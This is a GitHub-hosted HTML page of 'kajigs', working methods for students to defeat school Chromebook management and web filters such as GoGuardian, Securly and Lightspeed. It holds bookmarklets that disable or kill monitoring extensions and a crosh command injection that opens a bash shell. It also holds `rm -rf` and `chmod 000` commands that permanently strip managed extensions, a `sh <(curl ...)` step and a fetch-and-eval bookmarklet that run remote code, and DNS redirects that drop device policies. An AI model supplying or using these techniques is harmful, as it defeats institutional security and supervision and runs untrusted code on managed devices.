-
Notifications
You must be signed in to change notification settings - Fork 1
/
kajigs.html
1185 lines (1141 loc) · 84.2 KB
/
kajigs.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<head>
<link rel="image/icon">
</head>
<link href="./prism.css" rel="stylesheet" />
<script src="./prism.js"></script>
<title>Kajigs</title>
<!-- Paste in MD to html after here -->
<a href="../"><img src="https://raw.githubusercontent.com/T3M1N4L/T3M1N4L/main/images/XOsX.gif" style=" float: left; padding-right: 10px; width: 90px !important;"></img></a>
<h1 id="titanium-network-kajigs">Kajigs</h1>
<p>A repository of methods you can employ enabling you to bypass restrictions!</p>
<p><strong>PLEASE DO NOT USE KAJIGS FOR ILLEGAL ACTIVITY</strong></p>
<p>Limitations: Methods which are considered aggressive such as removing or damaging devices (e.g removing Enterprise Enrollment) are not allowed.</p>
<p>For quality purposes, only <code class="normlcode">Featured</code> kajigs will be listed here.</p>
<h3 id="current-tags">Current Tags:</h3>
<ul>
<li>Webview bypasses: kajigs that use a webview to operate</li>
<li>Extension bypasses: kajigs that allow you to manipulate extensions (adding, disabling, etc.)</li>
<li>Bookmarklets: bookmarks that run JavaScript code to do something, usually embedding proxies or similar into your current page</li>
<li>Filter bypasses: kajigs that let you get around your filters</li>
<li>Other: kajigs that do not fit in the aforementioned categories</li>
<li>Mod post: mod posts. May or may not be kajigs, read them anyways</li>
<li>Patched: these kajigs have been patched by software vendors. THIS DOES NOT MEAN THE KAJIG IS UNUSABLE. For example, see "Chrome100 - Downgrade your Chrome OS"</li>
<li>Featured: Extraordinary kajigs (chosen by mods)</li>
<li>chromeOS: chromeOS specific kajigs</li>
<li>Windows: Windows specific kajigs</li>
<li>macOS: macOS specific kajigs</li>
<li>Mobile: Mobile specific kajigs</li>
</ul>
<h2 id="prevent-tab-close-goguardian-etc">Prevent Tab Close (GoGuardian, etc.)</h2>
<p>This is a really old exploit that originates all the way back to 2017/2018. Essentially it prevents your tab from being closed in the most simple way. Use as needed.</p>
<pre><code class="language-js">javascript: onbeforeunload = (i) => 1;
</code></pre>
<p>Paste the above in a bookmark and run it on whatever tab you want to prevent force closing!</p>
<h2 id="tab-disguise">Tab Disguise</h2>
<p>Disguises the icon and name of the tab you're on with the icon and name given in the code</p>
<p>Setup: Create a bookmark, copy the provided code and paste it in as the URL (name it whatever you want).</p>
<pre><code class="language-js">javascript: (function () {
var link =
document.querySelector("link[rel*='icon']") ||
document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href =
"https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_5.ico";
document.title = "My Drive - Google Drive";
console.log(document.title);
document.getElementsByTagName("head")[0].appendChild(link);
})();
</code></pre>
<p>Alternatively, you can use this code to update the disguise every second (same setup)</p>
<pre><code class="language-js">javascript: function gcloak() {
var link =
document.querySelector("link[rel*='icon']") ||
document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href =
"https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_5.ico";
document.title = "My Drive - Google Drive";
console.log(document.title);
document.getElementsByTagName("head")[0].appendChild(link);
}
gcloak();
setInterval(gcloak, 1000);
</code></pre>
<p>The 2 scripts given use a Google Drive disguise as an example, but they can be customized</p>
<ul>
<li>To change the favicon, replace the link in line 4 with your own image link</li>
<li>To change the title, replace the text in the ''s on line 5 with your own title</li>
<li>To change the timing, replace the number in line 9 with your own timing (in milliseconds)
ge link.href to change the favicon/logo.</li>
</ul>
<h2 id="porta-proxy-hapara">Porta Proxy (Hapara)</h2>
<p>Allows you to access a given site within other tabs; bypasses Hapara</p>
<p>Setup: Create a bookmark, copy the provided code and paste it in as the URL (name it whatever you want).</p>
<pre><code class="language-js">javascript:((function(){
var a,b,c;c="WEBSITE HERE",
b=document.createElement("iframe"),
b.setAttribute("src",c),b.setAttribute("id","rusic-modal"),
b.setAttribute("style","position: fixed; width: 100%; height: 100%; top: 0; left: 0; right: 0; bottom: 0; z-index: 99999999999; background-color: #fff;"),
a=document.getElementsByTagName("body")[0],
a.appendChild(b)})).call(this)
</code></pre>
<p>To close the Porta Proxy, create another bookmark with this code:</p>
<pre><code class="language-js">javascript: var element = document.getElementById("rusic-modal"); element.parentNode.removeChild(element);
</code></pre>
<p>In order to use Porta-Proxy, you must supply your own proxy website link in the bookmarklet; you put the link inside the quotation marks that read "WEBSITE HERE", and you have to include https://</p>
<h2 id="permanently-remove-extensions-past-v106">Permanently Remove Extensions (Past v106)</h2>
<p>Credits: CoolElectronics</p>
<p>This exploit is currently the most flexible and effective method in TN right now as a result of the bounty made by luphoria. Criteria was to simply bypass the Enterprise Policy ArcEnabled: false but resulted in a much more effective exploit in the end.</p>
<p>This exploit details another way to permanently delete extensions. Once done, you can update or restart your chromebook and the extensions will stay gone until you powerwash.</p>
<p>You need a usb for downgrading, and rudimentary knowledge of bash is recommended.</p>
<h3 id="steps">STEPS:</h3>
<p>Downgrade to any version below 103. Instructions are in "Chrome100 - Downgrade your Chrome OS".</p>
<p>Hit ctrl alt t to open a crosh window. If it’s blocked by extensions, use LTBEEF. If it’s policy blocked (“The person who set up this computer has chosen to block this site”) you can try downgrading to a version below 90, where crosh had a different URL
Type in <code class="normlcode">set_cellular_ppp \';bash;exit;\'</code> and hit enter.</p>
<p>You now have access to a bash shell, logged in as chronos. More information about the permissions of this shell is at the bottom.</p>
<p>Type <code class="normlcode">rm -rf ~/Extensions/*</code>. THIS WILL BREAK EVERY EXTENSION ON YOUR CHROMEBOOK. If there are extensions you want to keep, they can be selectively removed by ID.</p>
<p>Run <code class="normlcode">chmod 000 ~/Extensions</code>. This marks the extension folder as read only, stopping it from updating in the future or any new extensions from being installed.</p>
<p>You can now restart chrome, allowing it to update to the latest version. Once rebooted onto the latest version, all removed extensions will have the default icon and won’t function at all</p>
<p><strong>If you would like Root Access, go to Root Escalation</strong></p>
<p>You can also run <code class="normlcode">set_cellular_ppp \'chmod 777 ~/Extensions;rm -rf ~/Extensions;mkdir ~/Extensions;chmod 000 ~/Extensions;echo done;exit\'</code> in crosh to do it all in one step</p>
<p><a href="https://discord.com/channels/419123358698045453/1033121753263771709">https://discord.com/channels/419123358698045453/1033121753263771709</a></p>
<h2 id="root-escalation">Root Escalation</h2>
<p>Have the ability to run developer mode content, enable developer mode, bypass pretty much everything with one exploit. Will require the downgrade methods.</p>
<p>Has so many branches that I’m just going to link the Kajig discussion. Check the pins in the TN Discord server.</p>
<p><a href="https://discord.com/channels/419123358698045453/1033537020854800434">https://discord.com/channels/419123358698045453/1033537020854800434</a></p>
<h2 id="swamp-for-goguardian-only">[swamp] FOR GOGUARDIAN ONLY:</h2>
<p>Functions like LTBEEF, the GUI based exploit which Bypassi originally lead for disabling extensions. However unlike the Bypassi based exploit, swamp still remains unpatched on versions post v102 up to even v107.</p>
<p>This will allow you to:</p>
<ul>
<li>Disable force-installed extensions similarly to LTBEEF even on Chrome 107 where it's patched</li>
<li>Run bookmarklets on any page even when they are blocked</li>
<li>Break GoGuardian until powerwash (or until you choose to turn it back on)</li>
<li>Run a custom DNS to block network requests without actually being on a DNS</li>
<li>Run your own custom code with access to most of the chrome API</li>
</ul>
<p><a href="https://discord.com/channels/419123358698045453/1040775494406250548">https://discord.com/channels/419123358698045453/1040775494406250548</a></p>
<h2 id="kiosk-exploit-de-licensed-original">KIOSK Exploit (DE-LICENSED) (Original):</h2>
<p>Although many variations of this exploit exist, this was the very original implementation of it. However, the process never went as far or flexible as a full Chrome browser window being able to be created out of this method rather than just a simple bypass within the KIOSK app.</p>
<p>Credits to B3AT and Divide for this exploit.</p>
<p>This exploit allows you to open an unrestricted Chrome instance within a kiosk app, i.e. with the kiosk user account permissions.</p>
<h3 id="steps-1">Steps:</h3>
<ul>
<li>Any kiosk app installed</li>
<li>[for v77<=x<=v85] OOBE/fresh install</li>
<li>Sign out</li>
<li>Turn Wi-Fi off</li>
<li>Enable ChromeVox (ctrl+alt+z)</li>
<li>Open a kiosk app</li>
<li>Spam Search+o+k (you do have to re-click o and k)</li>
<li>While spamming click "Diagnose"</li>
</ul>
<p>Note: The exploit should work consistently v76 or below but it's still possible to pull off on v85 or below, but only once (right after you powerwash).</p>
<h2 id="userpolicy-bypass">UserPolicy Bypass:</h2>
<p>This should enable ARC (Play Store) and unblock all <strong>policy</strong> blocked URLs.</p>
<p>When you connect to a wifi without the custom DNS the policy will reload to normal but some changes will persist, more testing is needed. This is useful because most root exploits require ARC in some form.</p>
<h3 id="you-need">You need:</h3>
<ul>
<li>The ability to downgrade to a version below 102</li>
<li>A way to access crosh. If it's blocked via extension, use LTBEEF. If it's blocked by user policy, you must use a combination of Incognito Exploit (v81) and Crosh Bypass (Daybreak)</li>
<li>A router or hotspot capable of either blocking websites via parental control or setting a custom DNS (129.213.58.41)</li>
</ul>
<h3 id="steps-2">Steps:</h3>
<ul>
<li>Downgrade to a version</li>
<li>Open crosh (ctrl+alt+t)</li>
<li>Elevate to a chronos shell by typing in set_cellular_ppp ';bash;exit'</li>
<li>Run the command <code class="normlcode">sh <(curl -k https://coolelectronics.me/bypass.sh) & disown</code></li>
<li>Remove your school account, log out or just clear it in any way you can. The method varies depending on how device policy is set up.</li>
<li>In your router settings, set the DNS to <code class="normlcode">129.213.58.41</code> or <code class="normlcode">block m.google.com</code>. (NOT THE NETWORK DNS ON THE CHROMEBOOK, IT WONT WORK; ROUTER!)</li>
</ul>
<p><strong>[EXTRAS]:</strong> personalDNSfilter and hotspot or DNS Sinkhole + Hotspot on iOS can be used; NextDNS</p>
<ul>
<li>Log into your school account</li>
</ul>
<p>Results should prompt you about a PIN and Google Play then drop you into an account where everything works as normal but no user policies are set. If you get a "sign in required" error, try steps again.</p>
<p><a href="https://discord.com/channels/419123358698045453/1040639727595950180">https://discord.com/channels/419123358698045453/1040639727595950180</a></p>
<h2 id="ltbeef---disable-any-extension">LTBEEF - Disable ANY Extension</h2>
<p>LTBEEF is an incredibly powerful exploit which can be utilized to disable any extension, including GoGuardian, Securly, Lightspeed, ....</p>
<p>Credits to Bypassi and CompactCow.</p>
<h3 id="bookmarklets">Bookmarklets</h3>
<p><strong>Option A - GUI Based</strong></p>
<pre><code class="language-js">javascript: fetch("https://compactcow.com/ltbeef/exploit.js").then((data) => {
data.text().then((text) => {
eval(text);
});
});
</code></pre>
<p>Click it once (not on a new tab) to get to the correct webstore page, then again to open the UX.</p>
<p><strong>Option B - if Option A doesn't load</strong></p>
<ul>
<li>Go to <a href="https://chrome.google.com/webstorex">https://chrome.google.com/webstorex</a> and run this bookmarklet</li>
</ul>
<pre><code class="language-js">javascript: prompt("Extension IDs here: (seperated by commas)")
.split(",")
.forEach((i) => {
chrome.management.setEnabled(i.trim(), !1);
});
</code></pre>
<h3 id="if-bookmarklets-are-disabled">If bookmarklets are disabled:</h3>
<ul>
<li>Set your DNS to the following:
<code class="normlcode">129.213.138.223</code></li>
<li>Visit chrome://restart</li>
<li>Visit <a href="https://chrome.google.com/">https://chrome.google.com/</a></li>
<li>You should see a warning. Click on the warning symbol (⚠️) and type thisisunsafe.</li>
<li>You should see a simple interface which lets you enable and disable your extensions.</li>
</ul>
<h2 id="history-deletion-2-v106">History Deletion #2 (v106+)</h2>
<p><strong>IMPORTANT NOTE: THIS WILL WIPE ALL SYNCED DATA, NOT JUST HISTORY</strong></p>
<p>SYNC DATA INCLUDES APPS, NON-MANAGED EXTENSIONS, BOOKMARKS, AND MORE</p>
<ul>
<li>Make sure you're synced to google chrome or else it won't work, as you need to be able to access chrome.google.com/sync</li>
<li>Go to <a href="https://chrome.google.com/sync">https://chrome.google.com/sync</a></li>
<li>Press "clear data" at the bottom</li>
<li>Sign out of your account and remove the account from the device</li>
<li>Sign back in and history should be gone</li>
</ul>
<h2 id="downgrade-your-chrome-os-chrome100">Downgrade your Chrome OS (Chrome100)</h2>
<p>This provides a basic tool required for many exploits as a prerequisite.</p>
<p>Chrome100 is a website which enables you to download old versions of Chrome OS for your Chromebook.
Old versions may have vulnerabilities which are now patched; thus, these old Chrome OS images are essential for many exploits!</p>
<p><a href="https://chrome100.dev">https://chrome100.dev</a></p>
<p><strong>Maintained by Divide</strong></p>
<h2 id="ingot-extension-removal-dns">Ingot Extension Removal (DNS)</h2>
<ul>
<li>Go to the settings then click the Wi-Fi you are on.</li>
<li>Scroll down to where it says Network, click on that then select Nameservers</li>
<li>Select Custom Nameservers and in the four prompts enter <code class="normlcode">198.98.53.76</code></li>
<li>Go to a new tab and in the url bar type and run <code class="normlcode">chrome://restart</code> (this will restart your Chromebook without signing you out)</li>
<li>Go to a new tab and search <code class="normlcode">chrome.google.com</code>. If that doesn't work try <code class="normlcode">https://chrome.google.com/webstoreV5Y8F</code></li>
<li>Type <code class="normlcode">thisisunsafe</code> and the GUI will load.</li>
</ul>
<p>CREDIT TO COMPACTCOW AND NEBELUNG AND BYPASSI</p>
<h2 id="unblocked-devtoolsflags-advanced">Unblocked DevTools/Flags (ADVANCED)</h2>
<p>This is a guide on how to use chrome launch options and a thread for discussing exploits related to the bash shell. I have been requested to make this several times</p>
<p>First of all, you will need some knowledge of bash, and you must know how to use vi.</p>
<p>This builds off of Permanently Remove Extensions (past v106).</p>
<p>Follow the instructions there, and stop once you have the bash shell.</p>
<ul>
<li>Run <code class="normlcode">cd ~/Downloads</code></li>
<li>Run <code class="normlcode">vi exploit.sh</code> to create a new shell file.</li>
<li>In this shell file, put the line <code class="normlcode">pkill -9 chrome</code></li>
<li>After that, head over to <code class="normlcode">chrome:version</code>, and next to "command line options:" copy the entire really long thing</li>
<li>Paste it into vi as a new line.</li>
</ul>
<p>Now you can add whatever launch options you want! these are like the flags in chrome:flags, but there are way more available.</p>
<p>The full list is here: <a href="https://peter.sh/experiments/chromium-command-line-switches/">https://peter.sh/experiments/chromium-command-line-switches/</a></p>
<p>Some notable ones are: <code class="normlcode">--force-devtools-available</code> (devtools), <code class="normlcode">--bwsi</code> (guest mode), <code class="normlcode">--kiosk</code>(useless but funny), <code class="normlcode">--oauth-client-id</code>(breaks policy updating and profile syncing), <code class="normlcode">--disable-extensions-except</code>, <code class="normlcode">--show-login-dev-overlay</code>/<code class="normlcode">--show-oobe-dev-overlay</code>, <code class="normlcode">--enable-hangout-services-extension-for-testing</code>(adds a bunch of useless extensions), and more.</p>
<p>To execute chrome with the launch options set, exit vi (impossible), and run <code class="normlcode">sh <(cat exploit.sh) & disown</code></p>
<h2 id="istealyourdns-dns">IStealYourDNS (DNS)</h2>
<p>IStealYourDNS is a TitaniumNetwork-partnered service. With it, you can seamlessly block many web filters (GoGuardian, Lightspeed, ...) and never think about bypassing filters ever again.</p>
<h3 id="installation">Installation</h3>
<p>To install it, simply open your Wi-Fi's DNS settings, and set the name servers to "Custom" - replace any options available with <code class="normlcode">72.5.33.65</code>. If you have multiple boxes, set the last one to <code class="normlcode">1.1.1.1</code>.</p>
<p>Then, simply restart and you're done!</p>
<h2 id="better-dns-bypass-dns">Better DNS Bypass (DNS)</h2>
<ul>
<li>Know the credentials of your School's WIFI or utilize a hotspot</li>
<li>Go to <code class="normlcode">chrome:policy</code> and Ctrl+F for <code class="normlcode">deviceopennetworkconfig</code>; click show more</li>
<li>Edit the attached ONC, changing the GUID to the guid in the policy and the security to the security in the json; same with the name, SSID, and finally change the passphrase to the password</li>
<li>Import the ONC in <code class="normlcode">chrome:network#general</code></li>
<li>Go to Wi-Fi settings as normal and the DNS shouldn't be blocked</li>
</ul>
<p>ONC: <a href="https://cdn.discordapp.com/attachments/1042601318105239562/1042928899371323402/bypass.onc">https://cdn.discordapp.com/attachments/1042601318105239562/1042928899371323402/bypass.onc</a></p>
<h2 id="get-proton-vpn-on-chromebooks">Get Proton VPN on Chromebooks</h2>
<ul>
<li>Create or log into a proton VPN account</li>
</ul>
<p><a href="https://account.protonvpn.com/signup">https://account.protonvpn.com/signup</a></p>
<ul>
<li>Once you have an account go to - account > OpenVPN / IKEv2 username</li>
<li>Copy the username and password</li>
<li>Unzip the files and choose any server that you want to use (like us-19 or s/t)</li>
<li>Edit it in the Text editor app (it's a built-in chrome app on Chromebook) or any other text editor</li>
<li>All the way at the end, after "TLSAuthContents": "-----BEGIN OpenVPN Static key V1----- put in</li>
</ul>
<pre><code class="normlcode"> ,
"Username": "(Put your username here)",
"Password": "(Put your password here)"
</code></pre>
<p>You can just copy and paste it and you'll get the right formatting.</p>
<p>Make sure that you start the paste right after the end quotation mark.</p>
<ul>
<li>Save the onc file</li>
<li>Upload it to <code class="normlcode">chrome://network#general</code> all the way at the bottom where it says Import ONC File (don't worry if you don't notice anything, just try scrolling down a little more and it should say <code class="normlcode">Networks imported: 1</code> (regardless of how many you actualy imported)</li>
</ul>
<h2 id="incognito-exploit-v81">Incognito Exploit (v81)</h2>
<p>This is the first Licensed exploit to be declassified as a Kajig!</p>
<p>This still needs to be improved.</p>
<p>Make sure to downgrade to chrome OS v81 or lower first: "Chrome100 - Downgrade your Chrome OS"</p>
<h3 id="steps-to-the-incognito-exploit-summarized">Steps to the Incognito Exploit, summarized</h3>
<p>(Steps before include getting on the login screen to the part where you are signing in as a new user. Enter your email and password but don't login. Do Alt + Shift + I. Continue to Step 1 where you spam "Privacy Policy".)</p>
<ul>
<li>Follow the steps but once it gets to the "Privacy Policy" part, spam it for a minute or 30 seconds (until its very laggy)</li>
<li>Once you login go quickly to the Incognito Tab and do Ctrl+Shift+N</li>
<li>Do the Switch/Desktop View key and close the original Incognito Tab</li>
<li>If it continues to open policy pages, repeat Step 3.</li>
</ul>
<h3 id="benefits">Benefits:</h3>
<ul>
<li>No extensions so you won't have to worry about anything being blocked by an extension.</li>
<li>Access to a fully unrestricted YouTube.</li>
<li>Ability to sign into other google accounts. (if blocked)</li>
<li>Be able to access the majority of chrome:// urls if they were blocked by policy.</li>
<li>Get past policy blocks. (Untested fully but certain sites that were blocked by policy were unblocked for me.)</li>
<li>Use flags to further experiment with you chromebook. Applies to chrome:// urls being unblocked.</li>
<li>Access to an "experimental" unblocked chrome. (Called experimental as it is both restricted and not restricted.)</li>
</ul>
<h3 id="possible-errors-you-may-encounter">Possible Errors (you may encounter):</h3>
<ul>
<li>When importing an onc file, crash.</li>
<li>Don't go to chrome://os-settings or try to view Settings from the Incognito tab.</li>
<li>Restarting to modify flags will close the tab, however the effects will be applied when you restart.</li>
<li>When importing an extension (unpacked or entire crx), you will encounter the error "not allowed on login screen"</li>
</ul>
<p>The following exploit is still a massive WIP and the following above may be subject to change or expand.</p>
<h2 id="process-end-method">Process End Method</h2>
<ul>
<li>Open Task Manager</li>
<li>Press 'search'+'esc'</li>
<li>Scroll all the way to the bottom and find your blocker extension and highlight it (click on it)</li>
<li>Click 'End Process' it or press 'enter'</li>
<li>Immediately go to your page and see that it's unblocked</li>
<li>This will not last unless you use this bookmarklet javascript:onbeforeunload=i=>1</li>
</ul>
<p>If Task Manager is blocked:</p>
<ul>
<li>Go to <code class="normlcode">chrome-extension://</code> + your Extension ID + <code class="normlcode">/_generated_background_page.html</code></li>
<li>You can find the Extension ID by going to the puzzle piece, clicking on the 3 dots next to your filter and click manage extension and the is will be in the url</li>
<li>The link for GoGuardian is <code class="normlcode">chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/_generated_background_page.html</code></li>
<li>Change the URL to <code class="normlcode">chrome://kill</code> (I recommend making it a bookmark (if your school blocked bookmarklets this one will still work))</li>
</ul>
<h2 id="personaldnsfilterhotspot">personalDNSfilter/Hotspot</h2>
<p><a href="https://f-droid.org/en/packages/dnsfilter.android/">https://f-droid.org/en/packages/dnsfilter.android/</a></p>
<ul>
<li>Download personalDNSfilter from the link</li>
<li>Install it on phone</li>
<li>Open the app</li>
<li>Click on the box beside DNS</li>
<li>Check the Disable DNS server discovery</li>
<li>Remove all dns ip</li>
<li>Set it to one of these choices:</li>
</ul>
<h3 id="dns-servers">DNS Servers:</h3>
<ul>
<li>45.128.53.172 (watch this tutorial <a href="https://youtu.be/qo-hx0tOYxI">https://youtu.be/qo-hx0tOYxI</a> (only works with goguardian</li>
<li>129.213.58.41</li>
<li>51.161.64.196</li>
</ul>
<h3 id="extras">Extras</h3>
<ul>
<li>wifi network + usb tethering</li>
<li>cellular network + hotspot</li>
<li>cellular network + hotspot app</li>
</ul>
<p>You may need to update the DNS servers on your current phone WIFI network.</p>
<h2 id="stealth-lightspeed">Stealth (Lightspeed)</h2>
<p>This trick is specifically for when your chromebook is "locked" by a teacher, and any site you go to will get closed instantly. It can also hide the tab from the teachers and get around the "[teacher's name] has blocked this site" screen.</p>
<p>The way it works is by letting you put an iframe inside of the new tab window, where most chrome extensions don't have permission. This means that if a page is "temporarily blocked" by a teacher or they lock your chromebook you can still access almost every page that works in an iframe. I don't know what it shows up as on the teacher screen, but they likely will just see the new tab and not the actual site.</p>
<ul>
<li><p>Set your default search engine to bing</p>
</li>
<li><p>Open a new tab</p>
</li>
</ul>
<p>Use this bookmarklet:</p>
<pre><code class="language-js">javascript:document.write(`<style> iframe{margin:0px; border:none; padding:0px; outline:none} body{margin:0px}</style><iframe src = "${prompt("enter url")}" width = ${window.innerWidth} height = ${window.innerHeight} />`)
</code></pre>
<p>Enter a url that you want to visit.</p>
<p>Notes:</p>
<ul>
<li>This only works if bookmarklets are enabled</li>
<li>Works ONLY with Lightspeed</li>
</ul>
<h2 id="playstore-bypass-v106">Playstore Bypass (v106+)</h2>
<p>Make sure you are upgrading or powerwashing/recovering. Chrome Device Manager's notification should appear otherwise this will not work.</p>
<p><strong>MAKE SURE TO HAVE A HOME ACCOUNT ADDED!</strong></p>
<ul>
<li>Literally just log out/shutdown/restart when the Chrome Device Manager notif appears. LOCKING DOES NOT WORK.</li>
<li>Open PlayStore and keep it open. Try to download some apps. Fiddle around with it. Don't switch accounts as that might lock you out.</li>
</ul>
<p>Add accounts in <code class="normlcode">settings -> your school account name -> add account</code>. You don't need to go to Android settings and shouldn't!</p>
<p><strong>EASIER GUIDE</strong>
After Powerwash, Recovering, removing account and adding it back in:</p>
<ul>
<li>The moment <code class="normlcode">Chrome Device Manager</code> pops up ( 💼 ) do <code class="normlcode">chrome://restart</code></li>
<li>After that open Google Play and switch to your home account</li>
</ul>
<h2 id="goguardian-discord-unblock">GoGuardian Discord Unblock</h2>
<p>This only works for Discord and Youtube.</p>
<h3 id="type-1">Type 1</h3>
<pre><code class="normlcode">data:text/html,<script>window.location.href='https://discord.com/app?%27+%27e%27.repeat(16380)%3C/script%3E
</code></pre>
<p>Open this in a new tab.</p>
<h3 id="type-2">Type 2</h3>
<p>Bookmark and open this in a new tab.</p>
<pre><code class="normlcode">javascript:window.open('https://discord.com/app?'+'e'.repeat(16384));
</code></pre>
<h2 id="killcurly-securly-v107">killcurly (Securly, v107+):</h2>
<p>RIP Cookie Dough to leaking. Regardless here is another exploit related to bypassing Securly.</p>
<ul>
<li>Visit <code class="normlcode">chrome://settings/signOut</code> (the O must be capital) and click the blue button. If this is "blocked_by_administrator", DM <code class="normlcode">SprinkzMC#8421</code> for an alternate URL.</li>
<li>Visit <code class="normlcode">chrome://restart</code>. Alternatively, you can go to the Securly details in <code class="normlcode">chrome://extensions</code> and click "Allow access to file URLs" or just use <code class="normlcode">chrome://kill</code> on one of its extension pages. Securly will now reload and be broken.</li>
<li>Go to <code class="normlcode">https://tinyurl.com/addsession</code> and add your school account back (personal accounts may even work for some people).
<strong>This has to be repeated each time you sign out of your computer. Feel free to test this for other extensions too.</strong></li>
</ul>
<h1 id="windows-laptop-tutorial">Windows Laptop Tutorial</h1>
<h3 id="httpslearnmicrosoftcomen-ustrainingmodulesimplement-common-integration-features-finance-ops10-exercise-1"><a href="https://learn.microsoft.com/en-us/training/modules/implement-common-integration-features-finance-ops/10-exercise-1?source=learn">https://learn.microsoft.com/en-us/training/modules/implement-common-integration-features-finance-ops/10-exercise-1</a></h3>
<blockquote>
<p>Not everything is unbl0cked; some things will still be blocked. Either figure out how to install a VPN on Microsoft Edge or deal with it :/
If you see ERR_SSL_PROTOCOL_ERROR it probably means that you were blocked.</p>
</blockquote>
<p>For the first time, you will need to sign up. After that, everything should be simple.</p>
<h2 id="signing-up">Signing Up</h2>
<p><img src="./assets/button1.png" alt="Sign in to launch VM mode"></p>
<ol>
<li>Press that</li>
<li>Sign in with your school email</li>
<li>Microsoft will ask you a few questions. Just choose anything, it doesn't matter much.</li>
<li>Finish sign up</li>
<li>You might see a captcha. Complete it, and if it doesn't complete, just refresh.</li>
<li>Captcha should be gone and you see a button that says "Launch VM mode" in the same place where it said "Sign in to launch VM mode"</li>
</ol>
<h2 id="starting-the-windows-laptop">Starting the Windows laptop</h2>
<p><img src="./assets/windows.png" alt="VM"></p>
<ol>
<li>Press "Launch VM mode" button</li>
<li>You should see what the image above shows</li>
<li>The password is exactly <code class="normlcode">pass@word1</code></li>
<li>Open the Edge Browser!</li>
</ol>
<h2 id="getting-a-vpn---fully-unbl-ck-the-browser">Getting a VPN - fully unbl-ck the browser</h2>
<ol>
<li>In the laptop in Edge, search up "Edge Addons"</li>
<li>In Edge Addons, search for "free VPN"</li>
<li>Find a VPN and get/install the extension</li>
<li>Press the puzzle piece at the top, and press the eye next to the extension you downloaded</li>
<li>Press on the new icon that appears at the top, and then figure out what you have to do to get the VPN working. The VPN might not work, so just installing a different one.</li>
<li>Use the VPN. Some stuff might be slower but the browser will be unbl0cked.</li>
</ol>
<p>Later I might make a tutorial on fully unbl0cked Linux (like Windows) + Chrome which doesn't need a VPN and might be faster.</p>
<h1 id="loginpass">LOGINpass</h1>
<blockquote>
<p>There are 3 ways to do this. The first one probably will be hard to block. The second <em>will</em> be easy to block, if you know how to do it. The third is essentially the same as the first one but with a different route. The first and third require you to know the email of another person in the IPSD district.</p>
</blockquote>
<h2 id="important">Important:</h2>
